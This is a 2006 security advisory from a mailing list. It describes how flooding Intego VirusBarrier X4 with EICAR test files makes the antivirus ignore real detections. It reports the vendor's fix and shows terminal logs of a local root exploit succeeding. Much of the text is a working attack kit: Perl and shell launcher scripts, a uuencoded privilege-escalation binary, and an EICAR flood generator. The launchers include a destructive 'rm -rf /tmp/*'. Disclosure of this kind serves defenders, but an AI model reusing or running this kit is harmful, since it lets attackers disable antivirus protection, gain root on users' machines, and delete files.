Network Security: Detailed info on [NEWS] Intego VirusBarrier X4 Definition Bypass (Exploit)

Subject:	[NEWS] Intego VirusBarrier X4 Definition Bypass (Exploit)
Date:	14 Nov 2006 15:31:39 +0200

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Intego VirusBarrier X4 Definition Bypass (Exploit)
------------------------------------------------------------------------


SUMMARY

Intego VirusBarrier X4 is "the simple, fast and non-intrusive antivirus 
security solution for Macintosh computers, by Intego, the leading 
publisher of personal security software for Macintosh. It offers thorough 
protection against viruses of all types, coming from infected files or 
applications, whether on CD-ROMs, DVDs or other removable media, or on 
files downloaded over the Internet or other types of networks".

Although VirusBarrier does a pretty good job of halting malicous activity 
the product currently suffers from a flaw related to the amount of alerts 
that it can process simultaneously. If an attacker is able to trigger 
multiple alerts in succession within a very short amount of time he or she 
may be able cause VirusBarrier to completely ignore positive matches 
against virus definitions. The consequences of ignored matches may include 
full system compromise or further spreading of malware.

DETAILS

As an example we will show how VirusBarrier normally stops a local root 
exploit with behavior similar to 'OSX.ExploitMachex.A', then we will 
demonstrate how the VirusBarrier protection can be bypassed by using a 
simple flood of Eicar Test files.

Any typical attempt to access or execute a file or program that is a match 
for a VirusBarrier definition results in an alert on the user interface. 
There is a sweet lookin insulin bottle on the screen that slowly empties 
as the virus nears eradication.

'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do 
('Ignore' || 'Repair')?

Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus 
program existed at all.

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 
79(appserverusr), 80(admin)

On the other hand if you chose 'Repair' the process is terminated dead in 
its tracks and the file is nulled out:

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit
-rwxr-xr-x   1 virusbar  wheel  0 Oct 31 02:02 excploit

The above output demonstrates how Virusbarrier is supposed to work. Under 
normal circumstances this would be adequate to stop a
malicious attack.

If however an attacker floods the file system with dummy virus files at a 
quick rate the VirusBarrier software will promptly stop responding after 
presenting the user with a few audible and visual alerts. After about 40 
some odd infected files in a row the system will become confused and in 
some cases VirusBarrier may stop responding completely. (Intego confirmed 
a limit of 20 files)

When under attack the user may see dozens of messages on the screen. With 
our example code the messages are similar to the following:

'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?

From the attackers standpoint the exploitation is fairly quick and simple.

Our example uses a local root exploit however this tactic could easily be 
applied to any existing malware technique that Intego VirusBarrier 
protects against. Code could in theory be run as a precursor to an InqTana 
attack as a means to bypass the Intego protection. The existing signatures 
for InqTana A B C and D would then be completely useless and an E variant 
would be born.

virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl      Pwntego.sh      README.txt      pwntego.uu      
rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p; 
P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p; 
P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel), 
81(appserveradm), 79(appserverusr), 80(admin)
rm: /tmp/objc_sharing_ppc_92: Permission denied

In the above example 'OSX.ExploitMachex.A' is being executed on a machine 
that is actively protected by VirusBarrier. In a matter of seconds the 
Intego engine is flooded and the attacker has the ability to completely 
ignore any Intego virus and malware definitions.

One fun side effect of this attack is that the user must manually ignore a 
number of alerts. The users is either forced to Wait for each alert to 
timeout on its own after several seconds or respond individually to each 
one.

This attack has a fairly obvious signature in syslog if the attacker is 
making use of the example code provided in this text. Obviously using 
random viruses and better random locations and names is a possible vector 
for a crafty attacker.

virusbarrier-users-ibook:/var/log root# tail -n 30 /var/log/vbmgvx.log
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by 
OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by 
EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by 
EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698 
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099 
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377 
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818 
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261 
by EICAR Test

With the current fixes in place once VirusBarrier gets 19 alerts, the next 
malware is simply quarantined until the administrator can repair them. In 
our example, the additional processes get a permission error when they are 
executed.

Of course since everyone knows there is no malware for Macintosh this 
scenario would quite simply never be encountered..... *smirk*

The Intego staff was more than helpful and willing to address this issue 
in a timely fashion. After communications were established this problem 
was addressed, and fixes were out the door to customers in a matter of 2 
days. How about that for turn around time!

Workaround:
Please update to the latest version of Intego Virus Barrier and the latest 
Vdefs:  <http://www.intego.com/services/updates.asp?product=VirusBarrier> 
http://www.intego.com/services/updates.asp?product=VirusBarrier

Intego has fixed this bug in the 2006/11/01 Vdef files.

Exploits:
Pwntego.pl
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# If you are lucky this *may* bring VirusBarrier to 100% CPU usage also.
# It sounds like my mac mini is gonna fucking launch off my desk. heh!
system("rm -rf /tmp/* > /dev/null");
for($i =0; $i <= 40; $i=$i+1) # Is 40 the magic virus limit for Intego??
{
 system("./rand-eicar.pl&");
# sleep 1;
}
printf("\n");
printf("Injecting pwnacillin shot\n");
system("uudecode pwntego.uu;chmod +x pwntego; rm -rf /tmp/sh; cp -rf 
/usr/bin/id /tmp/sh; ./pwntego");
system("rm -rf /tmp/* > /dev/null");

Pwntego.sh
#!/bin/sh
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
rm -rf /tmp/*
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
uudecode pwntego.uu
chmod +x pwntego
rm -rf /tmp/sh
cp -rf /usr/bin/id /tmp/sh
/pwntego
rm -rf /tmp/*

pwntego.uu
begin 644 pwntego
M_NWZS@```!(``````````@````H```5$````A0````$````X7U]004=%6D52
M3P```````````````!`````````````````````````````````$`````0``
M`8Q?7U1%6%0````````````````0````$``````````0``````<````%````
M!0````!?7W1E>'0`````````````7U]415A4````````````````%K0```7X
M```&M`````(``````````(``!````````````%]?<&EC<WEM8F]L7W-T=6)?
M7U1%6%0````````````````<K`````````RL`````@``````````@```"```
M```````D7U]S>6UB;VQ?<W1U8@```%]?5$585````````````````!RL````
M````#*P````"``````````"````(`````````!1?7W!I8W-Y;6)O;'-T=6(Q
M7U]415A4````````````````'*P```*@```,K`````(``````````(``!`@`
M````````(%]?8W-T<FEN9P````````!?7U1%6%0````````````````?3```
M`+0```],`````@```````````````@```````````````0```=!?7T1!5$$`
M```````````````@````$````!`````0``````<````#````!@````!?7V1A
M=&$`````````````7U]$051!````````````````(`````"@```0``````(`
M`````````````````````````%]?;&%?<WEM8F]L7W!T<@!?7T1!5$$`````
M```````````@H````%0``!"@`````@``````````````!P```!4`````7U]N
M;%]S>6UB;VQ?<'1R`%]?1$%400```````````````"#T````&```$/0````"
M```````````````&````*@````!?7V1Y;&0`````````````7U]$051!````
M````````````(0P````<```1#`````(``````````````````````````%]?
M8G-S``````````````!?7T1!5$$````````````````A*````!``````````
M`P```````````````0``````````7U]C;VUM;VX``````````%]?1$%400``
M`````````````"%`````.``````````$```````````````!````````````
M```!````.%]?3$E.2T5$250``````````#`````0````(`````[8````!P``
M``$`````````!`````X````<````#"]U<W(O;&EB+V1Y;&0````````,````
M-````!A%(8IM`$<!!``!```O=7-R+VQI8B]L:6)3>7-T96TN0BYD>6QI8@``
M`````@```!@``"``````A@``)W0```=D````"P```%``````````5````%0`
M```7````:P```!L``````````````````````````````````":T````,```
M```````````````````````6````$```)D@````;````!0```+`````!````
M*```%K0`````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````?#H+>#@A__Q4(0`T.````)`!``"4(?_`@'H``#B:``0[8P`!5WL0
M.GRDVA1(```)?^``"'P(`J:_@?_PD`$`")0A_Z!"GP`%?^@"IGQ\&WA\G2-X
M?+XK>$@``;$\7P``DX()!#Q?``"3H@D(/%\``)/""0P\7P``@$(*`(&"```O
MC```0;X`#'V)`Z9.@`0A/%\``(!""?R!@@``+XP``$&^``Q]B0.F3H`$(4@`
M!8T\7P``@8()&(`,```O@```0;X`#'V)`Z9.@`0A2```]3Q?``"!@@D4@`P`
M`"^```!!O@`,?8D#IDZ`!"$\?P``.&,(5#B!`$!(``%E@&$`0"^#``!!O@`(
M2``%$3@````\7P``@$()^)`"``"!/0``?2)+>"^)``!!G@!D.4```#E@``"(
M"0``?``'="^```!!G@`P?`)8KGP`!W0O@``O0+X`"'U+$A0Y:P`!?2)+>'P)
M6*Y\``=T+X```$">_]@OB@``09X`##@*``%(```(@!T``#Q?``"0`@D0?\;S
M>(`>```O@```09X`$(0&``0O@```0)[_^'^#XWA_I.MX?\7S>#C&``1(``+5
M2``$/7P(`J:3X?_\D`$`")0A_Z!"GP`%?^@"ICQ_```X8P;@.($`0$@``'F!
M@0!`?8D#IDZ`!"&``0!H."$`8'P(`Z:#X?_\3H``(#U@``"!:R$,+(L``$&&
M``A.@``@.*``3CB```!@A!^8.&```C@```1$```".&``.S@```%$```"?^``
M"#V```"`#"$,?`D#ICV```!AC!``3H`$(#U@``"!:R$0?6D#IDZ`!"!\"`*F
MOZ'_])`!``B4(?^@?#X+>)!^`'B0G@!\.&```3B``"A(``2I?&`;>)`>`$"`
M7@!`@!X`>)`"``2`7@!`@!X`?)`"``B`7@!`.```*)`"``"#O@!`.&`!+4@`
M!%&0?0`0.&`!+8">`$!(``0A@"$``(`!``A\"`.FNZ'_]$Z``"!\"`*FO\'_
M^)`!``B4(?^@?#X+>)!^`'B0G@!\.````)`>`$@X8`$M2``$`9!^`$`X'@!`
MD!X`1(!>`$2``@``+X```$">``A(``!X@%X`1(!"``"`0@`$@!X`>'^"``!`
MG@!,@%X`1(!"``"`0@`(@!X`?'^"``!`G@`T@%X`1(`"``"0'@!(@3X`1(!>
M`$B``@`0D`D``(!>`$B``@``+X``*$&>`!Q(``-!@%X`1(!"```X`@`0D!X`
M1$O__WPX8`$M@)X`0$@``T&`'@!(+X```$&>`#2`7@!(@`(`#"^```!!G@`<
M@%X`2(`"``R`?@!(?`P#>'V)`Z9.@`0A@'X`2$@``L6`(0``@`$`"'P(`Z:[
MP?_X3H``('P(`J:_P?_XD`$`")0A_Z!\/@MX0I\`!7_H`J9(``)Q/%\``(!"
M!BB``@`(D!X`0(`>`$`O@```09X`'(!>`$"@`@`$5``$/BN```)`G0`(2```
M'#Q?``"`8@5$2``"$3Q?``"`8@5`2``!Y8`A``"``0`(?`@#IKO!__A.@``@
M?`@"IK_!__B0`0`(E"'_H'P^"WA"GP`%?^@"ICQ?``"`0@6P@`(``)`>`$`X
M'@!$@'X`0#B```%\!0-X2``#L8!^`$"`G@!$@+X`1#C``!1(``-]@'X`0#B`
M``*`O@!$.,```SC@``%(``-%2``#(7Q@&W@O@```09X`*#Q?``"`8@6L.(`"
M`("^`$0XP```2``"W3A@``!(``*U2```+#A@``,\GP``.(0%T$@``H$\?P``
M.&,$D#R?```XA`2@.*```$@``DDX````?`,#>(`A``"``0`(?`@#IKO!__A.
M@``@?`@"IK_!__B0`0`(E"'_L'P^"WA"GP`%?^@"II!^`&B0G@!LD+X`<)#>
M`'20_@!XD1X`?)$^`("17@"$@'X`<(">`(PXH`"`.,```4@``;V`7@",@'X`
M<(""```\OP``.*4#Y#C``(!(``&!.````'P#`WB`(0``@`$`"'P(`Z:[P?_X
M3H``('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#['V)`Z9.@`0@?`@"ID*?``5]
M:`*F/6L``'P(`Z:%BP/0?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+
M`[1]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#F'V)`Z9.@`0@?`@"
MID*?``5]:`*F/6L``'P(`Z:%BP-\?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``
M?`@#IH6+`V!]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#1'V)`Z9.
M@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP,H?8D#IDZ`!"!\"`*F0I\`!7UH
M`J8]:P``?`@#IH6+`PQ]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L"
M\'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP+4?8D#IDZ`!"!\"`*F
M0I\`!7UH`J8]:P``?`@#IH6+`KA]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\
M"`.FA8L"G'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP*`?8D#IDZ`
M!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`F1]B0.F3H`$('P(`J9"GP`%?6@"
MICUK``!\"`.FA8L"2'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP(L
M?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`A!]B0.F3H`$('P(`J9"
MGP`%?6@"ICUK``!\"`.FA8L!]'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(
M`Z:%BP'8?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`;Q]B0.F3H`$
M(`````!?7V1Y;&1?;6]D7W1E<FU?9G5N8W,```!?7V1Y;&1?;6%K95]D96QA
M>65D7VUO9'5L95]I;FET:6%L:7IE<E]C86QL<P````!4:&4@:V5R;F5L('-U
M<'!O<G0@9F]R('1H92!D>6YA;6EC(&QI;FME<B!I<R!N;W0@<')E<V5N="!T
M;R!R=6X@=&AI<R!P<F]G<F%M+@H``"]U<W(O8FEN+V-H<V@```!C:'-H````
M````````````````````'TP``"%$```:P```&:0``!D@2```%0``````$```
M```````0``!\J`*F.&```SB%```X``##1````F`````X8```.```%T0```)@
M````.&```#@``+5$```"8````#AE`&@XA0!TD&0``#@``#M$```"8````#@`
M``%$```"+R\O+W1M<"]S:````````````````!CX```8^```&/@``!CX```8
M^```&/@``!CX```8^```&/@``!CX```8^```&/@``!CX```8^```&/@``!CX
M```8^```&/@``!CX```8^```&/@`````````````````````````````````
M````````````````````````````&/@`````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````0:9`$`````%K0```0B@`````````````1$@`````````````169`$`
M````%N@```179`$`````%N@```1P9`$`````%N@```2./`````````````2=
M#@8`````(!````2R#@8`````(!0`````1`$`L@``%N@`````1`$`O0``%PP`
M````1`$`P```%Q``````1`$`P0``%Q@`````1`$`P@``%R``````1`$`Q```
M%R@`````1`$`Q0``%SP`````1`$`Q@``%T0`````1`$`QP``%U@`````1`$`
MR@``%V``````1`$`SP``%V0`````1`$`T```%W@`````1`$`V0``%X``````
M1`$`W0``%X0`````1`$`W@``%Y@`````1`$`ZP``%Z``````1`$`[```%[``
M````1`$`[0``%[P`````1`$`\```%\``````1`$`\@``%]``````1`$`\P``
M%^``````1`$`]```%^0`````1`$`]0``%_@`````1`$`]@``&`@`````1`$`
M]```&`P`````1`$`^```&"0`````1`$`^0``&"P`````1`$`^P``&#0`````
M1`$!!@``&$``````1`$!"P``&%P`````1`$!#```&'0```3B)`$`L@``%N@`
M``3V@`````````````4"0```KP```!P```4M0```L````!T```550```L0``
M`!X```5A@`````````````5L@`````````````5X0```LP````L```6!0```
MM`````H```6*0```M@````8```63@```N0```$````6LP`$`````%PP```6M
MX`$`````&'0```6N)````````8P```6O#@$`````&'0`````1`$!)@``&'0`
M````1`$!*0``&(P`````1`$!*P``&)P`````1`$!+```&*@```7%)`$!)@``
M&'0```7A@``!)P```$````7IP`$`````&(P```7JX`$`````&+P```7K)```
M`````$@```7L(```+0````````7Z(```+@````````8((```+P````````87
M(```,`````````8I(```;@````````90(```;P````````9M)@8`=0``(!``
M``:()@8`>@``(!0```:^9`$`````&+P```:_#@D`````(0P```;D#@4`````
M'Y@```;R#@D`````(1`````@'@$`````&1`````S'@$`````&+P```!%'@$`
M````%N@```!6'@$`````&/@```<+#@$`````&2````<N#@$`````&:0```=4
M#@H`````(2@```=:#@8`````("`````$#P8`$```(``````,#P8`$```(`0`
M``!U#P$`````&L`````4#P8`$```(`P```"^#PL`````(4````#B`P``$```
M$`````#V#PL`````(40```$)#PL`$```(4@```$@#PL`$```(4P```$]#P$`
M$```'"0```%C#PL`$```(5````%V#PL`$```(50```&0#PL`$```(5@```&K
M#PL`$```(5P```'(#PL`$```(6````'B#PL`$```(60```(##PL`$```(6@`
M``(E#PL`$```(6P```))#PL`$```(7````!-#P8`$```(`@```**#P$`````
M&T````*0#PL`$```(70```!O#P$`````%K0```";`0`!`0````````*A`0`!
M``````````#+`0`!``````````*R`0`!`0````````+5`0`!`0````````+[
M`0`!`0````````,)`0`!`0````````,O`0`!`0````````-7`0`!`0``````
M``$!`0`!`0````````->`0`!`0````````)J`0`!``````````-L`0`!````
M``````-X`0`!`0````````)Q`0`!`0````````-_`0`!`0````````-F`0`!
M`0````````)W`0`!``````````.%`0`!`0````````.;`0`!`0````````.O
M`0`!`0````````/'`0`!``````````/8`0`!`0````````/C`0`!`0``````
M``/]`0`!`0````````0*`0`!`0````````04`0`!`0````````%?```!8```
M`>,```((```""@```A@```(:```"'@```R<```-N```#J```!*,```2N```$
MM```!+H```4,```%'```!Q<```<C```'*@``!S@```=(```)MP``"M````M3
M```+;@``"YP```!Y````=````&L```!O````;@```'````![````<P```'(`
M``!Q````=0```(0```"#````>````($```"%````?0```'H```""````?P``
M`'X```!Y````=````&L```!O````;@```'````![````<P```'(```!Q````
M=0```(0```"#````>````($```"%````?0```'H```""````?P```'X```!V
M````;0```'P```!L````=P```(``````7TY807)G8P!?3EA!<F=V`%]?7W!R
M;V=N86UE`%]?9'EL9%]F=6YC7VQO;VMU<`!?7V1Y;&1?:6YI=%]C:&5C:P!?
M7W-T87)T`%]E;G9I<F]N`&1Y;&1?<W1U8E]B:6YD:6YG7VAE;'!E<@!S=&%R
M=`!?7U]D87)W:6Y?9V-C,U]P<F5R96=I<W1E<E]F<F%M95]I;F9O`%]?7VME
M>6UG<E]D=V%R9C)?<F5G:7-T97)?<V5C=&EO;G,`7U]C<&QU<U]I;FET`%]?
M8W1H<F5A9%]I;FET7W)O=71I;F4`7U]M:%]E>&5C=71E7VAE861E<@!?7V]B
M:F-);FET`%]A=&5X:70`7V-A=&-H7V5X8V5P=&EO;E]R86ES90!?8V%T8VA?
M97AC97!T:6]N7W)A:7-E7W-T871E`%]C871C:%]E>&-E<'1I;VY?<F%I<V5?
M<W1A=&5?:61E;G1I='D`7V-L;V-K7V%L87)M7W)E<&QY`%]D;U]M86-H7VYO
M=&EF>5]D96%D7VYA;64`7V1O7VUA8VA?;F]T:69Y7VYO7W-E;F1E<G,`7V1O
M7VUA8VA?;F]T:69Y7W!O<G1?9&5L971E9`!?9&]?;6%C:%]N;W1I9GE?<V5N
M9%]O;F-E`%]D;U]S97%N;W-?;6%C:%]N;W1I9GE?9&5A9%]N86UE`%]D;U]S
M97%N;W-?;6%C:%]N;W1I9GE?;F]?<V5N9&5R<P!?9&]?<V5Q;F]S7VUA8VA?
M;F]T:69Y7W!O<G1?9&5L971E9`!?9&]?<V5Q;F]S7VUA8VA?;F]T:69Y7W-E
M;F1?;VYC90!?97)R;F\`7V5X:70`7VUA8VA?:6YI=%]R;W5T:6YE`%]M86EN
M`%]R96-E:79E7W-A;7!L97,`7U]?:V5Y;6=R7V=L;V)A;`!?7V1Y;&1?<F5G
M:7-T97)?9G5N8U]F;W)?861D7VEM86=E`%]?9'EL9%]R96=I<W1E<E]F=6YC
M7V9O<E]R96UO=F5?:6UA9V4`7U]I;FET7VME>6UG<@!?7VME>6UG<E]G971?
M86YD7VQO8VM?<')O8V5S<W=I9&5?<'1R`%]?:V5Y;6=R7W-E=%]A;F1?=6YL
M;V-K7W!R;V-E<W-W:61E7W!T<@!?86)O<G0`7V-A;&QO8P!?9G)E90!?97AC
M7W-E<G9E<@!?97AE8VP`7V9O<FL`7VUA8VA?;7-G7W-E<G9E<E]O;F-E`%]M
M86-H7W!O<G1?86QL;V-A=&4`7VUA8VA?<&]R=%]I;G-E<G1?<FEG:'0`7VUA
M8VA?=&%S:U]S96QF7P!?<V5T<FQI;6ET`%]T87-K7W-E=%]E>&-E<'1I;VY?
M<&]R=',`7W9M7V%L;&]C871E`%]V;5]W<FET90!?=V%I=`!S=&%R="YS`&EN
M=#IT,3UR,3LM,C$T-S0X,S8T.#LR,30W-#@S-C0W.P!C:&%R.G0R/7(R.S`[
M,3(W.P``+U-O=7)C94-A8VAE+T-S=2]#<W4M-#8O`"]3;W5R8V5#86-H92]#
M<W4O0W-U+30V+V-R="YC`&=C8S)?8V]M<&EL960N`%]P;VEN=&5R7W1O7V]B
M:F-);FET`%]P;VEN=&5R7W1O7U]D87)W:6Y?9V-C,U]P<F5R96=I<W1E<E]F
M<F%M95]I;F9O`%]S=&%R=#I&*#`L,2D]*#`L,2D`=F]I9#IT*#`L,2D`87)G
M8SI0*#`L,BD]<B@P+#(I.RTR,30W-#@S-C0X.S(Q-#<T.#,V-#<[`&%R9W8Z
M4"@P+#,I/2HH,"PT*3TJ*#`L-2D]<B@P+#4I.S`[,3(W.P!E;G9P.E`H,"PS
M*0!I;G0Z="@P+#(I`&-H87(Z="@P+#4I`&DZ<B@P+#(I`'`Z<B@P+#0I`'$Z
M<B@P+#,I`'1E<FTZ*#`L-BD]*B@P+#<I/68H,"PQ*0````!?7V-A;&Q?;6]D
M7VEN:71?9G5N8W,`7V-A;&Q?;6]D7VEN:71?9G5N8W,Z9B@P+#$I`'`Z*#`L
M-BD`````3EA!<F=C.D<H,"PR*0!.6$%R9W8Z1R@P+#,I`&5N=FER;VXZ1R@P
M+#,I`%]?<')O9VYA;64Z1R@P+#0I`&UA8VA?:6YI=%]R;W5T:6YE.D<H,"PX
M*3TJ*#`L.2D]9B@P+#(I`%]C=&AR96%D7VEN:71?<F]U=&EN93I'*#`L."D`
M<&]I;G1E<E]T;U]O8FIC26YI=#I3*#`L-BD`<&]I;G1E<E]T;U]?9&%R=VEN
M7V=C8S-?<')E<F5G:7-T97)?9G)A;65?:6YF;SI3*#`L-BD``&1Y;&1?;&%Z
M>5]S>6UB;VQ?8FEN9&EN9U]E;G1R>5]P;VEN=`!E<G)O<E]M97-S86=E`&1Y
M;&1?9G5N8U]L;V]K=7!?<&]I;G1E<@!?9&%R=VEN7W5N=VEN9%]D>6QD7V%D
M9%]I;6%G95]H;V]K`%]D87)W:6Y?=6YW:6YD7V1Y;&1?<F5M;W9E7VEM86=E
67VAO;VL`7W)L+C``7VEM<&QA;G0`````
`
end

rand-eicar.pl
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
$test = rand($i);
open(OP,">/tmp/$test");
# Uh... this isn't eicar dumb shit... I should not have to break this line 
up.
printf OP "X5O!P" . "%@AP\[" . "4\PZX" . "54(P^)" . "7CC)7\}" . "\$EICAR" 
 "-STANDARD-ANTIVIRUS-TEST-FILE" . "!$H+H*";
print(";p;P;p;p");


ADDITIONAL INFORMATION

The information has been provided by  
<mailto:kf_lists@digitalmunition.com> K F.
The original article can be found at:  
<http://www.digitalmunition.com/DMA[2006-1031a].txt> 
